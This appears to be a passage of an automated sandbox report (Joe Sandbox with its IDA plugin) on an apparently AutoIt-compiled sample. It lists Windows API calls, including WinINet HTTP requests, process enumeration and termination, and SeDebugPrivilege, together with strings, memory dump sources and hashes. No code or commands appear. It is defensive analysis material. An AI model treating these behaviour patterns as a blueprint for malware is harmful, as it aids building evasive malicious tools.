                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharLower
                        • String ID: cdecl$none$stdcall$winapi
                        • API String ID: 707087890-567219261
                        • Opcode ID: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                        • Instruction ID: a85944c476fdbb752786f7c2737a2d5d6162752842f0496ea8cc5f1a2fb298aa
                        • Opcode Fuzzy Hash: 675da58a37a4f1bef0f6adae3d0e05855f85c38f3ccac47b0b06820331407fe0
                        • Instruction Fuzzy Hash: 5551A431A041169BCF16DF6CC9519FEB7A9BF64328B21422AEA56EB6C4DB30DD40C790
                        APIs
                        • CoInitialize.OLE32 ref: 003B3774
                        • CoUninitialize.OLE32 ref: 003B377F
                        • CoCreateInstance.OLE32(?,00000000,00000017,003CFB78,?), ref: 003B37D9
                        • IIDFromString.OLE32(?,?), ref: 003B384C
                        • VariantInit.OLEAUT32(?), ref: 003B38E4
                        • VariantClear.OLEAUT32(?), ref: 003B3936
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                        • API String ID: 636576611-1287834457
                        • Opcode ID: 076d3837bfee40486de8570c1594f0feef11b94e7e96f48608fae46fcebeadd9
                        • Instruction ID: 6c2145bdeead7718e51a84abba2150945bef5494e42ae324d084d3358f3a7efd
                        • Opcode Fuzzy Hash: 076d3837bfee40486de8570c1594f0feef11b94e7e96f48608fae46fcebeadd9
                        • Instruction Fuzzy Hash: 7961B171608321AFD712DF54C889FAAB7E8EF49718F004809F685DB691D770EE48CB92
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                          • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
                          • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
                          • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 003C8B6B
                        • ImageList_EndDrag.COMCTL32 ref: 003C8B71
                        • ReleaseCapture.USER32 ref: 003C8B77
                        • SetWindowTextW.USER32(?,00000000), ref: 003C8C12
                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003C8C25
                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 003C8CFF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                        • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#@
                        • API String ID: 1924731296-173764029
                        • Opcode ID: 5beb9f65328268c44cbe41f2893802623e9ebc881f1d8812416f45189a330f97
                        • Instruction ID: c12e06f26dbef3d3ebae04ea9392cfc7e8f5530fead4e9ee5b96408c1d51cb87
                        • Opcode Fuzzy Hash: 5beb9f65328268c44cbe41f2893802623e9ebc881f1d8812416f45189a330f97
                        • Instruction Fuzzy Hash: 62515B71104304AFD706EF24D995FAA77E4FB88714F00062DF956AB2E1CB71AE44CB62
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 003A33CF
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003A33F0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-3080491070
                        • Opcode ID: 065efaeebd0c1db42549896b97385dad9f45ab479c69129533afb7bf4def65ff
                        • Instruction ID: 94d66acb8dfe47d23b566a440513900d68ccecd0b59de5942d836da1b91f7433
                        • Opcode Fuzzy Hash: 065efaeebd0c1db42549896b97385dad9f45ab479c69129533afb7bf4def65ff
                        • Instruction Fuzzy Hash: 11518F72D00209AADF17EBA0CD86EEEB778EF05340F108166F5057A062EB716F58DB60
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                        • API String ID: 1256254125-769500911
                        • Opcode ID: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                        • Instruction ID: 96d3b64e85b544d0daae8fc646399a6cb80f3c916a0e808293005defd1b34887
                        • Opcode Fuzzy Hash: ade565452ec94c7356d9eebce60abb4553e05a29da88626a4a516b345ad0bbb1
                        • Instruction Fuzzy Hash: 7D41F832A000279BCF116F7DDE915BEF7A5AFA0754B264229E461DB284E731ED81C790
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 003A53A0
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003A5416
                        • GetLastError.KERNEL32 ref: 003A5420
                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003A54A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                        • Instruction ID: 2056a1371d0bfa673f0b16fafd0cc8533d71c99014063813e573572eb57ca595
                        • Opcode Fuzzy Hash: ac2a2c96f2756d6f2e4d7d95ac0d67541d44cf8a6d3ca421f8e07bde624a7034
                        • Instruction Fuzzy Hash: A631D335A00604DFC712DF6AC485EA97BB8EF1A305F188055E505CF652DB74ED82CB90
                        APIs
                        • CreateMenu.USER32 ref: 003C3C79
                        • SetMenu.USER32(?,00000000), ref: 003C3C88
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C3D10
                        • IsMenu.USER32(?), ref: 003C3D24
                        • CreatePopupMenu.USER32 ref: 003C3D2E
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003C3D5B
                        • DrawMenuBar.USER32 ref: 003C3D63
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                        • String ID: 0$F
                        • API String ID: 161812096-3044882817
                        • Opcode ID: 5b7ac8a325afb560152c3f053aeb4a9d1a80b2b070959cc40a574ceb75a214d3
                        • Instruction ID: 292b0ed4645cce2b5dfc9be98ade5e7ac90803390a47bea86ca1cbe88facf5c2
                        • Opcode Fuzzy Hash: 5b7ac8a325afb560152c3f053aeb4a9d1a80b2b070959cc40a574ceb75a214d3
                        • Instruction Fuzzy Hash: FF415975A01209AFDB15CF64D848FAA7BB9FF4A350F15402CE946E7360D731AE10CB94
                        APIs
                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003C3A9D
                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003C3AA0
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C3AC7
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003C3AEA
                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003C3B62
                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003C3BAC
                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003C3BC7
                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003C3BE2
                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003C3BF6
                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003C3C13
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$LongWindow
                        • String ID:
                        • API String ID: 312131281-0
                        • Opcode ID: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                        • Instruction ID: f2f70812aee2608e0b5ad3995fbe8d521817498e62f6b6a424d07b88d3379393
                        • Opcode Fuzzy Hash: 26b5531d4a7ea3b957e06b9065284c0a13683d04dcfefc3ce1d7da5a74432f59
                        • Instruction Fuzzy Hash: 38616B75900248AFDB11DFA8CD81FEE77B8EB09700F1081A9FA15EB2A1D774AE45DB50
                        APIs
                        • _free.LIBCMT ref: 00362C94
                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                        • _free.LIBCMT ref: 00362CA0
                        • _free.LIBCMT ref: 00362CAB
                        • _free.LIBCMT ref: 00362CB6
                        • _free.LIBCMT ref: 00362CC1
                        • _free.LIBCMT ref: 00362CCC
                        • _free.LIBCMT ref: 00362CD7
                        • _free.LIBCMT ref: 00362CE2
                        • _free.LIBCMT ref: 00362CED
                        • _free.LIBCMT ref: 00362CFB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                        • Instruction ID: 3b06803e0e14af01bb3303c2585da209a1c99ce02c6a4707cf5cadf7692a63c7
                        • Opcode Fuzzy Hash: 4691296bc750b94a2409472ee81b0a70e260c9a0efe49d3b49088edeed79e8e1
                        • Instruction Fuzzy Hash: 47119676600508AFCB07EF54D842CDE3BA5FF46390F4284A5F9485F226D731EA609B90
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00331459
                        • OleUninitialize.OLE32(?,00000000), ref: 003314F8
                        • UnregisterHotKey.USER32(?), ref: 003316DD
                        • DestroyWindow.USER32(?), ref: 003724B9
                        • FreeLibrary.KERNEL32(?), ref: 0037251E
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0037254B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 1c4691e45859780b1c1c7d08ee4119ab83111ed18a34432d5738318e4585a4a8
                        • Instruction ID: 4b768f951e3795bd90df95d18ca54036cf39d8376ed3f55238d0e5e88cec0a43
                        • Opcode Fuzzy Hash: 1c4691e45859780b1c1c7d08ee4119ab83111ed18a34432d5738318e4585a4a8
                        • Instruction Fuzzy Hash: D8D15A31701212CFDB2BEF15C899B2AF7A4BF05710F1582ADE84AAB251DB30AD52CF50
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00335C7A
                          • Part of subcall function 00335D0A: GetClientRect.USER32(?,?), ref: 00335D30
                          • Part of subcall function 00335D0A: GetWindowRect.USER32(?,?), ref: 00335D71
                          • Part of subcall function 00335D0A: ScreenToClient.USER32(?,?), ref: 00335D99
                        • GetDC.USER32 ref: 003746F5
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00374708
                        • SelectObject.GDI32(00000000,00000000), ref: 00374716
                        • SelectObject.GDI32(00000000,00000000), ref: 0037472B
                        • ReleaseDC.USER32(?,00000000), ref: 00374733
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003747C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                        • Instruction ID: 50679cf20b9d83c47f550d744b8dce5c36f311a6f197887ffa9e055e8895cbf7
                        • Opcode Fuzzy Hash: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                        • Instruction Fuzzy Hash: 0671CF31400245DFCF378F64C984ABA7BB9FF4A314F198269E96A9A166C335A881DF50
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LoadString$_wcslen
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 4099089115-2391861430
                        • Opcode ID: 47b9a6862aa2d3e4bea148c068a5068b697ed0e31a90a1f4e963711dad95edc3
                        • Instruction ID: 616e476da83c5d6205f365b904c93e44b61844531304d77c23df3905afc7c6f3
                        • Opcode Fuzzy Hash: 47b9a6862aa2d3e4bea148c068a5068b697ed0e31a90a1f4e963711dad95edc3
                        • Instruction Fuzzy Hash: EF518F72900209BBDF16EBA0CD82EEDBB78EF05310F148125F5057A1A1EB711A99DFA0
                        APIs
                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC29A
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC2CA
                        • GetLastError.KERNEL32 ref: 003AC322
                        • SetEvent.KERNEL32(?), ref: 003AC336
                        • InternetCloseHandle.WININET(00000000), ref: 003AC341
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                        • String ID:
                        • API String ID: 3113390036-3916222277
                        • Opcode ID: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                        • Instruction ID: 0dcb1599485d4e8ed1b3c741b4e68ff391984fc986a6e42a5a77ec6d00f078e0
                        • Opcode Fuzzy Hash: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                        • Instruction Fuzzy Hash: 98319FB5520204AFDB239F648C88EAB7BFCEB4A740F14A51EF44AD6640DB34ED059B60
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00373AAF,?,?,Bad directive syntax error,003CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003998BC
                        • LoadStringW.USER32(00000000,?,00373AAF,?), ref: 003998C3
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00399987
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString_wcslen
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                        • API String ID: 858772685-4153970271
                        • Opcode ID: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                        • Instruction ID: 42a86dfc067c3c54a7d03ea61ce84c158d1659c5e9059f88a98c2b74551bac8a
                        • Opcode Fuzzy Hash: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                        • Instruction Fuzzy Hash: 63212F3194021DABCF17AF90CC46EED7779FF18700F04945AF5156A0A1EB71AA18DB51
                        APIs
                        • GetParent.USER32 ref: 003920AB
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 003920C0
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0039214D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1290815626-3381328864
                        • Opcode ID: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                        • Instruction ID: 810663421ba8956b222b796727817650dd32de253ea519d525e4fbe4e36f5108
                        • Opcode Fuzzy Hash: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                        • Instruction Fuzzy Hash: 85112976688B0ABAFE072620DC0BDF7779CDB14329F210016FB04E91E1FE616C655614
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                        • String ID:
                        • API String ID: 1282221369-0
                        • Opcode ID: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                        • Instruction ID: cc7e9303b79155c90e16e578a74a78baeb1aaf79681798ee472b03cda994e824
                        • Opcode Fuzzy Hash: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                        • Instruction Fuzzy Hash: E1614A71A04301AFDB27AFB49C41B7A7BA5EF06350F06C16DF984AF249D7329D0187A0
                        APIs
                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 003C5186
                        • ShowWindow.USER32(?,00000000), ref: 003C51C7
                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 003C51CD
                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003C51D1
                          • Part of subcall function 003C6FBA: DeleteObject.GDI32(00000000), ref: 003C6FE6
                        • GetWindowLongW.USER32(?,000000F0), ref: 003C520D
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C521A
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003C524D
                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 003C5287
                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 003C5296
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                        • String ID:
                        • API String ID: 3210457359-0
                        • Opcode ID: 2e3559d66c1b37e77705442ec7fbfdc7b2e10e323fde04131ca4e7f09ed80f0f
                        • Instruction ID: bb8ca34b6e25b1bc27e653dcfc8d70e2ecfc47889d0f2d46607ab432b678e359
                        • Opcode Fuzzy Hash: 2e3559d66c1b37e77705442ec7fbfdc7b2e10e323fde04131ca4e7f09ed80f0f
                        • Instruction Fuzzy Hash: F351B130A50A08BEEF229F24CC4AFD97BA9EB05321F59441AF615DA2E1C775BDD0DB40
                        APIs
                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00386890
                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003868A9
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003868B9
                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003868D1
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003868F2
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 00386901
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0038691E
                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 0038692D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        • Opcode ID: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                        • Instruction ID: 4753c51287c0d3330b7f10c7b0f505c3bc5d0f6e083dbdabdef7fc008520723c
                        • Opcode Fuzzy Hash: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                        • Instruction Fuzzy Hash: 22514970600305AFDB22DF25CC56FAA7BB9EB44750F104528F956DA2A0DB70E991DB50
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC182
                        • GetLastError.KERNEL32 ref: 003AC195
                        • SetEvent.KERNEL32(?), ref: 003AC1A9
                          • Part of subcall function 003AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                          • Part of subcall function 003AC253: GetLastError.KERNEL32 ref: 003AC322
                          • Part of subcall function 003AC253: SetEvent.KERNEL32(?), ref: 003AC336
                          • Part of subcall function 003AC253: InternetCloseHandle.WININET(00000000), ref: 003AC341
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                        • String ID:
                        • API String ID: 337547030-0
                        APIs
                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925BD
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003925DB
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003925DF
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925E9
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00392601
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00392605
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0039260F
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00392623
                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00392627
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00391449,?,?,00000000), ref: 0039180C
                        • HeapAlloc.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391813
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391828
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00391449,?,?,00000000), ref: 00391830
                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391833
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391843
                        • GetCurrentProcess.KERNEL32(00391449,00000000,?,00391449,?,?,00000000), ref: 0039184B
                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 0039184E
                        • CreateThread.KERNEL32(00000000,00000000,00391874,00000000,00000000,00000000), ref: 00391868
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        APIs
                          • Part of subcall function 0039D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                          • Part of subcall function 0039D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                          • Part of subcall function 0039D4DC: CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA16D
                        • GetLastError.KERNEL32 ref: 003BA180
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA1B3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BA268
                        • GetLastError.KERNEL32(00000000), ref: 003BA273
                        • CloseHandle.KERNEL32(00000000), ref: 003BA2C4
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
